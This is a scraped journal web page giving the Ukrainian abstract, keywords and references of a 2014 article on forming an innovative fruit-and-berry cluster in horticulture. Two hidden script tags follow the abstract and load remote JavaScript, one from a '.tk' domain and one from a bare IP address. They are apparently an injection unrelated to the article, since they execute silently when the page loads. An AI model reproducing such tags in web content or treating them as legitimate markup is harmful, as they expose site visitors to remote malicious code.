ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.341.2:634
Сторінка молодого науковця

Особливості формування інноваційного кластера в галузі садівництва / Тупчій О. С. // Економіка АПК. - 2014. - № 2 - С. 120

Досліджено та удосконалено трактування понять «плодоягідний кластер» й «інноваційний плодоягідний кластер», сформульовано особливості його організації. Обґрунтовано доцільність формування інноваційного плодоягідного кластера з урахуванням регіональних особливостей сучасного розвитку галузі та ресурсного потенціалу підприємств як необхідну детермінанту відродження вітчизняного виробничого потенціалу, відновлення великотоварного виробництва продукції садівництва, підвищення ефективності інвестиційного розвитку галузі, впровадження сучасних інноваційних технологій, соціального розвитку сільських територій, підвищення життєвого рівня працівників, досягнення високого рівня економічного зростання й конкурентоспроможності. Удосконалено методичний підхід до оцінки ефективності функціонування кластера в регіоні, який враховує додатковий економічний ефект, що створюється в рамках кластера. Рис.: 2. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інноваційний плодоягідний кластер, конкурентоспроможність, учасники кластера, синергетичний ефект, державна регіональна політика, ефективність кластера, трансфертні ціни

Список використаних джерел

 1. Бакум В.В. Самоорганізація в агропромислових регіональних кластерах / В.В. Бакум // Економіка АПК. – 2009. – № 1. – С. 21-27.
 2. Концепція кластерної політики в Україні / [Федоренко В.Г., Тугай А.М., Гойко А.Ф., Джабейло В.Б.] // Економіка та держава. – 2008. – № 11. – С. 10-13.
 3. Кропивко М.Ф. Концептуальний підхід до кластерної організації та управління розвитком агропромислового виробництва / М.Ф. Кропивко // Економіка АПК. – 2010. – № 11. – С. 3-13.
 4. Россоха В.В. Кластерна модель організації виробничих систем / В.В. Россоха // Економіка АПК. – 2011. – № 10. – С. 146-152.
 5. Саблук П.Т. Кластеризація як механізм підвищення конкурентоспроможності та соціальної спрямованості аграрної економіки / П.Т. Саблук, М.Ф. Кропивко // Економіка АПК. – 2010. – № 1. – С. 3-12.
 6. Тупчій О.С. Кластери як інноваційна форма розвитку садівницьких підприємств / О.С. Тупчій // Materialy IX mezinarodni vedecko – prakticka konference «Moderni vymozenosti vedy – 2013». Dil 14. Ekonomicke vedy: Praha. Publishing House «Education and Science» s.r.o. – S. 61-62.
 7. Хабиров Г.А. Факторы устойчивости производства в садоводстве / Г.А. Хабиров, Г.З. Ситдикова // Аграрный вестник Урала. – 2009. – № 8 (62). – С. 40-43.
 8. Шаляпина И.П. Организационно-экономические аспекты системы ведения садоводства в условиях развития интеграционных процессов: моногр. / И.П. Шаляпина, М.А. Соломахин. – Мичуринск: изд-во МичГАУ, 2008. – 238 с.
 9. Юхимчук Л. Цели и задачи формирования и развития регионального инновационного кластера / Л. Юхимчук // Международний с.-х. журнал. – 2013. – № 3. – С. 41-44.
 10. Enright M. Regional Clusters and Economic Development: A Research Agenda: Paper presented at the Conference on Regional Clusters and Business Networks, Frederiction. – New Brunswick, 1993. – 27 p.
 11. Feser E.J. Old and New Theories of Industry Clusters / E.J. Feser // Clusters and Regional Specialisation: On Geography, Technology and Networks / еd. М. Steiner. – London: Pion, 1998. – Р. 18-40.
 12. Porter M.E. The Competitive Advantage of Nations / M.E. Porter. – New York: The Free Press, 1990. – 857 p.
 13. Practical Guide to Cluster Development // UK Department of Trade and Industry: England’s Regional Development Agencies. – 2006 [Електронний ресурс]. – Режим доступу: http://www.berr.gov.uk/files/file14008.pdf.
 14. Roelandt T.J.A. Cluster Analysis and Cluster-Based Policy Making: The State of The Art / T.J.A. Roelandt, P. Den Hertog // Boosting Innovation: The Cluster Approach. – Paris: OECD roceedings, 1999. – Р. 9-23.
 15. Schmitz H. On the clustering of small firms / Н. Schmitz // IDS Bulletin. – 1992. – Vol. 23, № 3, July.
 16. Van der Berg L. Growth Clusters in European Cities / L. Van der Berg, E. Braun, W. van Winden // An Integral Approach. Urban Studies. – 2001. – № 1. – Р. 186-206.
Читати статтю: 14_02_120-126.pdf
Читати переклад статті: 1402tupchiy.pdf